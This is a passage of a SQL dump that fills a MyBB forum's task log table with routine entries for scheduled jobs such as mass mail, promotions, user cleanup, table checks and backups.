successfully ran.'); INSERT INTO mybb_tasklog VALUES('13055', '9', '1351316728', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13056', '5', '1351316763', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13057', '9', '1351317405', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13058', '3', '1351317901', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13059', '1', '1351318026', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13060', '7', '1351318086', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13061', '5', '1351318725', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13062', '9', '1351319822', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13063', '5', '1351319910', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13064', '3', '1351320002', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13065', '9', '1351320059', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13066', '5', '1351320504', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13067', '9', '1351321012', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13068', '3', '1351321357', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13069', '1', '1351321359', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13070', '7', '1351321361', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13071', '5', '1351321506', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13072', '9', '1351322681', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13073', '5', '1351322739', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13074', '9', '1351324882', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13075', '3', '1351324923', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13076', '5', '1351325062', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13077', '1', '1351325502', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13078', '7', '1351325506', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13079', '5', '1351325990', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13080', '9', '1351326299', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13081', '5', '1351327776', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13082', '9', '1351327881', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13083', '3', '1351329104', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13084', '9', '1351329121', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13085', '1', '1351329441', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13086', '7', '1351329511', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13087', '5', '1351329514', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13088', '5', '1351330219', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13089', '9', '1351330238', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13090', '3', '1351330262', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13091', '9', '1351334346', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13092', '5', '1351334439', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13093', '3', '1351334538', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13094', '1', '1351334547', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13095', '7', '1351334578', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13096', '9', '1351334595', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13097', '5', '1351334742', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13098', '9', '1351335313', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13099', '3', '1351335980', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13100', '1', '1351335998', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13101', '7', '1351336006', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13102', '5', '1351336178', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13103', '9', '1351336591', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13104', '5', '1351337107', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13105', '9', '1351337683', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13106', '3', '1351337705', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13107', '9', '1351340248', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13108', '5', '1351340395', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13109', '3', '1351340417', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13110', '1', '1351340420', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13111', '7', '1351340446', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13112', '4', '1351340439', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13113', '5', '1351340709', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13114', '9', '1351340735', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13115', '3', '1351341013', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13116', '9', '1351341937', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13117', '5', '1351341949', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13118', '9', '1351342535', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13119', '3', '1351342748', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13120', '1', '1351342805', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13121', '7', '1351342852', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13122', '5', '1351343115', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13123', '9', '1351343813', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13124', '5', '1351345768', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13125', '9', '1351345797', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13126', '3', '1351345862', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13127', '9', '1351346697', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13128', '3', '1351348757', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13129', '1', '1351348849', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13130', '7', '1351348946', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13131', '5', '1351349091', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13132', '9', '1351349681', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13133', '5', '1351349721', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13134', '9', '1351352433', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13135', '3', '1351352491', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13136', '1', '1351352502', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13137', '7', '1351352503', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13138', '5', '1351352505', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13139', '5', '1351353133', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13140', '9', '1351353599', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13141', '3', '1351353867', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13142', '1', '1351354299', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13143', '7', '1351354466', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13144', '5', '1351354577', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13145', '9', '1351355685', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13146', '5', '1351355737', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13147', '3', '1351355751', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13148', '9', '1351356032', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13149', '5', '1351357485', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13150', '9', '1351357752', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13151', '3', '1351357758', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13152', '1', '1351358520', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13153', '7', '1351358522', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13154', '5', '1351358628', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13155', '9', '1351358873', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13156', '5', '1351358895', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13157', '3', '1351359121', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13158', '9', '1351359941', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13159', '5', '1351359947', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13160', '9', '1351362292', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13161', '3', '1351362967', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13162', '1', '1351363009', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13163', '7', '1351363022', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13164', '5', '1351363028', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13165', '9', '1351363184', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13166', '9', '1351363702', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13167', '5', '1351363706', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13168', '9', '1351364770', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13169', '3', '1351364781', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13170', '1', '1351364792', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13171', '7', '1351364803', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13172', '5', '1351364814', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13173', '9', '1351365022', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13174', '5', '1351365909', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13175', '9', '1351365932', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13176', '3', '1351366215', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13177', '9', '1351366817', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13178', '5', '1351367105', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13179', '9', '1351367713', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13180', '3', '1351367947', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13181', '1', '1351368003', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13182', '7', '1351368014', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13183', '5', '1351368310', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13184', '9', '1351368621', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13185', '5', '1351369507', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13186', '9', '1351369530', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13187', '3', '1351369921', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13188', '9', '1351370792', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13189', '5', '1351370797', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13190', '9', '1351371463', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13191', '3', '1351372777', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13192', '1', '1351372919', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13193', '7', '1351372924', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13194', '5', '1351372937', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13195', '9', '1351373346', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13196', '5', '1351373621', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13197', '3', '1351373630', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13198', '9', '1351374392', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13199', '5', '1351374396', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13200', '9', '1351377324', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13201', '3', '1351377369', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13202', '1', '1351377461', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13203', '7', '1351377782', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13204', '5', '1351377789', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13205', '9', '1351378581', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13206', '5', '1351378589', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13207', '3', '1351379229', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13208', '1', '1351379240', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13209', '7', '1351379278', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13210', '5', '1351379583', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13211', '9', '1351379710', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13212', '5', '1351383224', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13213', '9', '1351384010', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13214', '3', '1351384072', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13215', '1', '1351384082', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13216', '2', '1351384086', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13217', '7', '1351384088', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13218', '11', '1351384096', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13219', '5', '1351384119', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13220', '3', '1351384202', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13221', '9', '1351385417', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13222', '5', '1351385540', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13223', '9', '1351386664', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13224', '3', '1351386682', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13225', '1', '1351386705', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13226', '7', '1351386802', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13227', '5', '1351386810', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13228', '5', '1351387513', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13229', '9', '1351387527', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13230', '3', '1351387805', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13231', '5', '1351388415', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13232', '9', '1351389527', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13233', '5', '1351389547', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13234', '3', '1351389559', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13235', '1', '1351389689', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13236', '7', '1351390076', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13237', '5', '1351390082', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13238', '5', '1351390129', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13239', '9', '1351390297', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13240', '5', '1351391109', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13241', '9', '1351391129', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13242', '3', '1351391424', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13243', '9', '1351392596', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13244', '5', '1351392612', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13245', '9', '1351393880', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13246', '3', '1351393882', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13247', '1', '1351393963', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13248', '7', '1351393971', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13249', '5', '1351393973', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13250', '5', '1351394716', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13251', '9', '1351394731', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13252', '3', '1351395003', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13253', '9', '1351396033', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13254', '5', '1351396111', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13255', '9', '1351398253', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13256', '3', '1351398266', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13257', '1', '1351398582', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13258', '7', '1351398601', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13259', '5', '1351398690', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13260', '9', '1351399186', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13261', '3', '1351399275', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13262', '9', '1351402398', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13263', '5', '1351402862', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13264', '3', '1351402914', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13265', '1', '1351402917', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13266', '7', '1351403062', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13267', '9', '1351403746', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13268', '5', '1351403749', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13269', '3', '1351404030', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13270', '1', '1351404031', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13271', '7', '1351405459', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13272', '5', '1351406755', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13273', '9', '1351406784', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13274', '3', '1351406788', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13275', '9', '1351407315', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13276', '3', '1351409843', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13277', '1', '1351409855', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13278', '7', '1351409856', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13279', '5', '1351409858', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13280', '9', '1351410531', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13281', '5', '1351410598', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13282', '9', '1351413776', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13283', '3', '1351414810', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13284', '1', '1351414865', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13285', '7', '1351414873', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13286', '5', '1351414924', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13287', '9', '1351414958', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13288', '5', '1351415135', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13289', '9', '1351420641', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13290', '5', '1351420652', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13291', '3', '1351420661', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13292', '1', '1351420670', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13293', '7', '1351420674', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13294', '9', '1351421163', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13295', '5', '1351421232', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13296', '9', '1351422004', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13297', '3', '1351422019', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13298', '1', '1351422033', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13299', '7', '1351422046', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13300', '5', '1351422982', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13301', '9', '1351425561', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13302', '5', '1351425591', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13303', '3', '1351425674', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13304', '1', '1351425683', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13305', '4', '1351425901', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13306', '7', '1351425909', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13307', '5', '1351426068', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13308', '9', '1351426259', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13309', '5', '1351428252', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13310', '9', '1351429193', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13311', '3', '1351429204', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13312', '5', '1351429239', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13313', '1', '1351430620', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13314', '7', '1351430632', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13315', '5', '1351430655', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13316', '9', '1351430683', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13317', '5', '1351430724', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13318', '9', '1351430816', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13319', '3', '1351432915', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13320', '9', '1351432994', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13321', '5', '1351433143', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13322', '1', '1351433159', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13323', '7', '1351433169', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13324', '9', '1351433588', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13325', '5', '1351434459', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13326', '9', '1351434574', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13327', '3', '1351434610', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13328', '9', '1351435380', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13329', '5', '1351435531', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13330', '9', '1351436387', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13331', '3', '1351436438', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13332', '1', '1351436620', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13333', '7', '1351437094', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13334', '5', '1351438481', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13335', '9', '1351438991', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13336', '3', '1351439017', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13337', '5', '1351439118', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13338', '9', '1351439817', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13339', '3', '1351439960', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13340', '1', '1351440079', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13341', '7', '1351440140', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13342', '5', '1351440333', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13343', '9', '1351440813', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13344', '5', '1351441919', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13345', '9', '1351442394', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13346', '3', '1351442430', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13347', '9', '1351443594', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13348', '5', '1351443763', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13349', '3', '1351443792', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13350', '1', '1351443810', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13351', '7', '1351443823', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13352', '5', '1351444311', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13353', '9', '1351444413', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13354', '5', '1351445115', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13355', '9', '1351445226', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13356', '3', '1351445432', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13357', '9', '1351446578', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13358', '5', '1351446583', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13359', '9', '1351447319', 'The mass mail task successfully 